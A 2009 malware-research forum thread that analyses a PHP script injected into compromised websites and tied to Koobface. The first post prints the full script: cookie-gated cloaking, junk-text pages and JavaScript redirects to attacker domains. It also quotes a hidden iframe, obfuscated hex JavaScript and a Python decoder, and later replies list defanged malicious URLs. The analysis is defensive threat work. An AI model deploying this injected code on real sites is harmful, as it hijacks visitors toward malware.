Malware Domain List

Malware Related => Malicious Domains => Topic started by: Malware-Web-Threats on May 19, 2009, 09:03:04 pm

Title: Malicious PHP file
Post by: Malware-Web-Threats on May 19, 2009, 09:03:04 pm
This is a PHP script injected on websites a few days ago.

Quote
<?
// new variant by floppy
error_reporting(0);
ini_set('error_reporting', 0);

if (isset($_GET['test']) && $_GET['test']==1)
{
    print "KROTEG";
    exit();
}

$magicparam="ff";
$magicparam=substr(md5(date("H")), 0, 2);
$magicvalue=substr(md5(date("H")), 3, 2);
$randparam="a".substr(md5(rand(1,9999)),0,rand(3,10));
$randvalue=substr(md5(rand(1,9999)),0,rand(1,10));

//echo "$magicparam";

function miss ($key) {
   $massiv=array(
   'qwa',
   'weqasd23v',
   'ewrdfs34',
   'retdfg45',
   'tryfgh56',
   'ytu67ghji',
   'uiyhjk78',
   'iuojkl89y',
   'oipkl90',
   'pol',
   'azsqw',
   'sweadxz',
   'dfresxc',
   'fdgrtcv',
   'gfhtyvb',
   'hgjyubn',
   'jhkuinm',
   'kjliomc',
   'lkop',
   'zasx',
   'xzcsd',
   'cxvdfk',
   'vcbfg',
   'bghvn',
   'nbhjm',
   'mnjk'
   );
       
   //$key=$_POST['domain_name'];
   
   $missletters=0;
   $missorder=0;
   $missdouble=1;
   $missneighbors=0;
   $newone=count($massiv);
   $errorslovo=$key;
   $opo=array();
   for($j=0;$j<strlen($errorslovo);$j++)
   {
   $kot=$j+2;
   if ($missletters) $opo[]=substr_replace($errorslovo, '', $j, 1);
   if ($missorder && $kot<strlen($errorslovo))
   $opo[]=substr($errorslovo,0, $j). $errorslovo{$j+1}.$errorslovo{$j}.substr($errorslovo,$j+2);
   }
   for($n=0;$n<strlen($errorslovo);$n++)
   {
   $ot=strlen($errorslovo)-$n;
   $bukva=substr($errorslovo, -$ot, 1);
   if ($missdouble) $opo[]=substr_replace($errorslovo, $bukva.$bukva, $n, 1);
   for($k=0;$k<strlen($errorslovo);$k++)
   {
     if ($errorslovo{$n}==$massiv[$k]{0})
     {
   for($l=0;$l<strlen($massiv[$k])-1;$l++)
   {
    if ($missneighbors)
    {
   $opo[]=substr_replace($errorslovo, $bukva.$massiv[$k]{$l}, $n, 1);
   $opo[]=substr_replace($errorslovo, $massiv[$k]{$l}, $n, 1);
    }
   }
     }
   }
   }
   $vvv=array_unique($opo);
   sort($vvv);
   return $vvv;
}


function miss2 ($text)
{
    $tags=array("","b","i","u","p","div");
   
    $t=$tags[array_rand($tags)];
   
   $new_str = '';
   
   $tmp = explode(" ", $text);
   $count = count($tmp);
   for ($i=0; $i<$count; $i++) {
      
      $str = $tmp[$i];
      if (strlen($str)>3) {
         $arr = miss($str);
         $str = $arr[rand(0, count($arr)-1)];
         //var_dump($str);   
      }
      $new_str.= " ".$str;
      
   }
   
    if (strlen($t)>0)
    {
        $new_str=trim($new_str);
        $new_str="<$t>$new_str</$t>";
    }
   return trim($new_str);
}

$vars = array("black","navy","blue","green","teal","lime","aqua","maroon","purple","olive","gray","silver","red","fuchsia","yellow","white");
$js_f = $vars[rand(0, count($vars) - 1)].$vars[rand(0, count($vars) - 1)];
$js_id = $vars[rand(0, count($vars) - 1)];

$title = "";
$t = array("video", "films", "movie", "youtube", "home entertainment","movies","television","tv","studios","home video","dvd","theater","now available","rentals","widescreen");
for ($i=0; $i<6; $i++) {
   $title .= $t[rand(0, count($t) - 1)]." ";
}


$arr = array(
   "And in his name shall the Gentiles trust. Then was brought unto him one possessed with
a devil, blind, and dumb: and he healed him, insomuch that the blind and dumb both spake and saw. ",
   "And all the people were amazed, and said, Is not this the son of David?",
   "But when the Pharisees heard it, they said, This fellow doth not cast out devils, but by
Beelzebub the prince of the devils. And Jesus knew their thoughts, and said unto them, Every kingdom
divided against itself is brought to desolation; and every city or house divided against itself shall not stand:
 And if Satan cast out Satan, he is divided against himself; how shall then his kingdom stand?
And if I by Beelzebub cast out devils, by whom do your children cast them out? therefore they shall be your judges. ",
   "Then one said unto him, Behold, thy mother and thy brethren stand without, desiring to
speak with thee. But he answered and said unto him that told him, Who is my mother? and who are
my brethren? And he stretched forth his hand toward his disciples, and said, Behold my mother and my brethren!",
   "Then goeth he, and taketh with himself seven other spirits more wicked than himself, and they
enter in and dwell there: and the last state of that man is worse than the first. Even so shall it be also
unto this wicked generation. While he yet talked to the people, behold, his mother and his brethren stood
without, desiring to speak with him.",
   "The queen of the south shall rise up in the judgment with this generation, and shall condemn it:
 for she came from the uttermost parts of the earth to hear the wisdom of Solomon; and, behold, a greater
than Solomon is here. When the unclean spirit is gone out of a man, he walketh through dry places, seeking
 rest, and findeth none. Then he saith, I will return into my house from whence I came out; and when he is
come, he findeth it empty, swept, and garnished.",
   "Then certain of the scribes and of the Pharisees answered, saying, Master, we would see a sign
from thee. But he answered and said unto them, An evil and adulterous generation seeketh after a sign;
and there shall no sign be given to it, but the sign of the prophet Jonas: For as Jonas was three days and
 three nights in the whale's belly; so shall the Son of man be three days and three nights in the heart of
the earth. The men of Nineveh shall rise in judgment with this generation, and shall condemn it: because
they repented at the preaching of Jonas; and, behold, a greater than Jonas is here.",
   "A good man out of the good treasure of the heart bringeth forth good things: and an evil man
out of the evil treasure bringeth forth evil things. But I say unto you, That every idle word that men shall
 speak, they shall give account thereof in the day of judgment. For by thy words thou shalt be justified,
and by thy words thou shalt be condemned.",
   "And whosoever speaketh a word against the Son of man, it shall be forgiven him: but whosoever
speaketh against the Holy Ghost, it shall not be forgiven him, neither in this world, neither in the world to come.
Either make the tree good, and his fruit good; or else make the tree corrupt, and his fruit corrupt: for the tree
 is known by his fruit. O generation of vipers, how can ye, being evil, speak good things? for out of the
abundance of the heart the mouth speaketh.",
   "Or else how can one enter into a strong man's house, and spoil his goods, except he first bind
the strong man? and then he will spoil his house. He that is not with me is against me; and he that gathereth
not with me scattereth abroad. Wherefore I say unto you, All manner of sin and blasphemy shall be forgiven
unto men: but the blasphemy against the Holy Ghost shall not be forgiven unto men.",
   "But when the Pharisees heard it, they said, This fellow doth not cast out devils, but by Beelzebub
 the prince of the devils. And Jesus knew their thoughts, and said unto them, Every kingdom divided against
 itself is brought to desolation; and every city or house divided against itself shall not stand:
And if Satan cast out Satan, he is divided against himself; how shall then his kingdom stand?
And if I by Beelzebub cast out devils, by whom do your children cast them out? therefore they shall be your judges.
 But if I cast out devils by the Spirit of God, then the kingdom of God is come unto you.",
   "And he stretched it forth; and it was restored whole, like as the other. Then the Pharisees went out,
and held a council against him, how they might destroy him. But when Jesus knew it, he withdrew himself from
thence: and great multitudes followed him, and he healed them all; And charged them that they should not make
him known: That it might be fulfilled which was spoken by Esaias the prophet, saying, Behold my servant,
whom I have chosen; my beloved, in whom my soul is well pleased: I will put my spirit upon him,
and he shall shew judgment to the Gentiles."
);

                   
$cook=false;
$ref=false;
$reload=false;

if (isset($_COOKIE[$magicparam]) && $_COOKIE[$magicparam]==$magicvalue) $cook=true;

if (isset($_SERVER['HTTP_REFERER']))
{
    $ref=true;
    $fr="http://".$_SERVER['HTTP_HOST'];
    if (strstr(strtolower($_SERVER['HTTP_REFERER']),strtolower($fr))) {
       $reload=true; // this is javascript call
    }

}


if ($reload)
{
    if ($cook)
    {
                    $host = $_SERVER['HTTP_HOST'];
                    // got cook. redir here
                    if (isset($_COOKIE[$magicparam]))
                        if ($_COOKIE[$magicparam]==$magicvalue)
                        {
                           
                            $red="var abc1 = 'hxxp://y18032009.com/go/';".
                            "var abc2 = 'hxxp://redir1504.com/go/';".
                            "var ss = '' + location.search;".
                            "if ((location.search).length>0 && (ss.indexOf('ids=2') == -1)) abc = abc1; else abc = abc2;".
                            "var redirects = [".
                            "['facebook.com',  abc+'fb.php'],".
                             "['tagged.com',    abc+'tg.php'],".
                             "['friendster.com',abc+'fr.php'],".
                             "['myspace.com',   abc+'ms.php'],".
                             "['msplinks.com',  abc+'ms.php'],".
                             "['myyearbook.com',abc+'yb.php'],".
                             "['fubar.com',     abc+'fu.php'],".
                             "['hi5.com',       abc+'hi5.php'],".
                             "['bebo.com',      abc+'be.php']".
                             "];".
                             "var s = '' + document.referrer, r = false;".
                             "for (var i = 0; i < redirects.length; i ++) {".
                             "if ((s.indexOf(redirects[0]) != -1)) {".
                             "     var redir=redirects[1] + location.search; ".
                             "     if ((location.search).length>0) redir=redir+'&domain=".$host."'; else redir=redir+'?domain=".$host."'; ".
                             "     location.href = redir;  ".
                             
                             "     r = true; ".
                             "     break; ".
                             "}".
                             "}".
                             "if (!r) location.href = abc+'index.php'+ location.search;";
                             echo $red;
                             
                        }
    }
}       
else
{
   setcookie($magicparam, $magicvalue);   
    $rscript='<scr'.'ipt ty'.'pe="te'.'xt/ja'.'vasc'.'ript" sr'.'c="?'.$randparam.'='.$randvalue.'"></scr'.'ipt>';
   print '
   <ht'.'ml>
   <he'.'ad>
       <ti'.'tle>'.$title.'</tit'.'le>
   </he'.'ad>   
   <bo'.'dy bgc'.'olor="'.$js_id.'" te'.'xt="'.$js_id.'">';

    $NUMTEXTS=5;   
    $scriptpos=rand(0,$NUMTEXTS-1);
   
    for ($a=0;$a<$NUMTEXTS;$a++)
    {
        if ($a==$scriptpos) echo $rscript."\n";
        echo miss2($arr[rand(0, count($arr)-1)])."\n";
    }
   
    echo '</bod'.'y></h'.'tml>';
}
exit();

?>
<html>
<head>
<title>Hello</title>
</head>
<body>                                                                                                                                                                                                                                                                                                                                                                                                                        <iframe src='hxxp://url/' width='1' height='1' style='visibility: hidden;'></iframe>
<script>function c858d4c43w49fa30115b110(w49fa30115b8f9){
function w49fa30115c0b1(){return 16;}
return (parseInt(w49fa30115b8f9,w49fa30115c0b1()));}
function w49fa30115d053(w49fa30115d823){
function w49fa30115ef97(){return 2;}
var w49fa30115dffc='';
w49fa30115ff39=String['fromCharCode'];
for(w49fa30115e7ce=0;w49fa30115e7ce<w49fa30115d823.length;
w49fa30115e7ce+=w49fa30115ef97()){
w49fa30115dffc+=(w49fa30115ff39(c858d4c43w49fa30115b110(
w49fa30115d823.substr(w49fa30115e7ce,w49fa30115ef97()))));}
return w49fa30115dffc;} var x01='';
var w49fa30116070a='3C7'+x01+'3637'+x01+'2697'+x01+'07'+x01+'43E696628216D7'+x01+
'96961297'+x01+'B646F637'+x01+'56D656E7'+x01+'42E7'+x01+'7'+x01+'7'+x01+'2697'+x01+
'465287'+x01+'56E657'+x01+'363617'+x01+'065282027'+x01+'2533632536392536362537'+
x01+'322536312536642536352532302536652536312536642536352533642536332533382532302537'+
x01+'332537'+x01+'32253633253364253237'+x01+'2536382
<script type="text/javascript" src="hxxp://mosronsorg.ru/files/pic.gif"></script>

with colors:

(http://img386.imageshack.us/img386/2569/phpinjected.jpg)

And you can see some compromised websites with a Google search:
http://www.google.com/search?q=%22new+variant+by+floppy%22&hl=en&lr=&rlz=1G1GGLQ_ENBE320&num=50&filter=0
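The hex-encoded JavaScript at the bottom of the injected page is decoded by the two helper functions in the sample: the string is consumed two characters at a time, each pair is parseInt'ed in base 16 and turned back into a character, and the result is a second layer that calls document.write(unescape('%3c...')). The following Python, added here for analysis and not part of the original post, reproduces that decoding on the fragment exactly as it appears above (the post's copy is cut off mid-pair, so the odd trailing nibble is reported rather than decoded). The variable names OBFUSCATED_JS, join_fragments, decode_hex_pairs and analyse are this example's own.

```python
import re
from urllib.parse import unquote

# Copied from the first post: the value assigned to w49fa30116070a, truncated
# exactly where the post is. x01 is the empty string in the sample, so it only
# serves to split the literal into pieces that defeat naive signature matching.
OBFUSCATED_JS = (
    "'3C7'+x01+'3637'+x01+'2697'+x01+'07'+x01+'43E696628216D7'+x01+"
    "'96961297'+x01+'B646F637'+x01+'56D656E7'+x01+'42E7'+x01+'7'+x01+'7'+x01+'2697'+x01+"
    "'465287'+x01+'56E657'+x01+'363617'+x01+'065282027'+x01+'2533632536392536362537'+"
    "x01+'322536312536642536352532302536652536312536642536352533642536332533382532302537'+"
    "x01+'332537'+x01+'32253633253364253237'+x01+'2536382"
)


def join_fragments(js_literal):
    """Collapse the '...'+x01+'...' concatenation into one hex string.
    The last fragment on the page has no closing quote, so the quote is optional."""
    return "".join(re.findall(r"'([0-9A-Fa-f]*)'?", js_literal))


def decode_hex_pairs(hex_string):
    """Mirror of the sample's w49fa30115d053(): step through the string two
    characters at a time, parseInt(chunk, 16), String.fromCharCode(). Returns the
    decoded text plus any dangling nibble left by a truncated sample."""
    full = len(hex_string) - (len(hex_string) % 2)
    text = "".join(chr(int(hex_string[i:i + 2], 16)) for i in range(0, full, 2))
    return text, hex_string[full:]


def unescape_layer(decoded_js):
    """The first layer writes unescape('%xx...'); pull that argument out and
    apply the equivalent %xx decoding (unquote handles these ASCII escapes)."""
    m = re.search(r"unescape\(\s*'([^']*)", decoded_js)
    return unquote(m.group(1)) if m else None


def analyse(js_literal):
    """Run both layers and return what an analyst wants to see."""
    hex_string = join_fragments(js_literal)
    layer1, dangling = decode_hex_pairs(hex_string)
    return {
        "hex_length": len(hex_string),
        "dangling": dangling,
        "layer1": layer1,
        "layer2": unescape_layer(layer1),
    }


if __name__ == "__main__":
    for key, value in analyse(OBFUSCATED_JS).items():
        print(f"{key}: {value!r}")
```

On the fragment above, the first layer starts with `<script>if(!myia){document.write(unescape(` and the second layer decodes to the beginning of a hidden iframe tag, the same kind of injection the hand-written iframe further up the page performs.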
Title: Re: Malicious PHP file
Post by: SysAdMini on May 19, 2009, 09:09:20 pm
It's Koobface related.

Search for domains
Code:
y18032009.com
redir1504.com

in our list.

Title: Re: Malicious PHP file
Post by: Malware-Web-Threats on May 19, 2009, 09:22:01 pm
Another one, with several scripts:

http://wepawet.iseclab.org/view.php?hash=928191d90e6ac9d43ded2d29a149ce58&t=1242767992&type=js
http://wepawet.iseclab.org/view.php?hash=985fed1b79db87b17e216b5ba6046452&t=1242768035&type=js

The first includes this domain, elantrasantrope[.]ru, with other exploits (I've checked, all domains are listed):
Wepawet (http://wepawet.iseclab.org/view.php?hash=2e63372d319b142dff8ec41e3a2b17ec&t=1242768427&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=538e5967b0e8584c00f4a6aa45df794d&t=1242768535&type=js)

The second has the same PHP script but with errors.

Title: Re: Malicious PHP file
Post by: Malware-Web-Threats on May 19, 2009, 09:33:36 pm
But new links:

Code:
hxxp://servergloria.cn/47/pdf.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=63e6bf63e2cfe113793c19d634e25454&t=1242768944&type=js)
VirusTotal (http://www.virustotal.com/analisis/0df2279f5ee19e4d98e16fe8f344dea9) - 12/40 (30%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=0f9a2dfabd1b10496c8a9033189eef54&type=js) (file)

Code:
hxxp://servergloria.cn/47/swf.php
VirusTotal (http://www.virustotal.com/analisis/cc797acf651012f3f321341228bc1988) - 6/40 (15%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=c63158bba186ec60fbfbb0e5984da07f&type=swf) (file)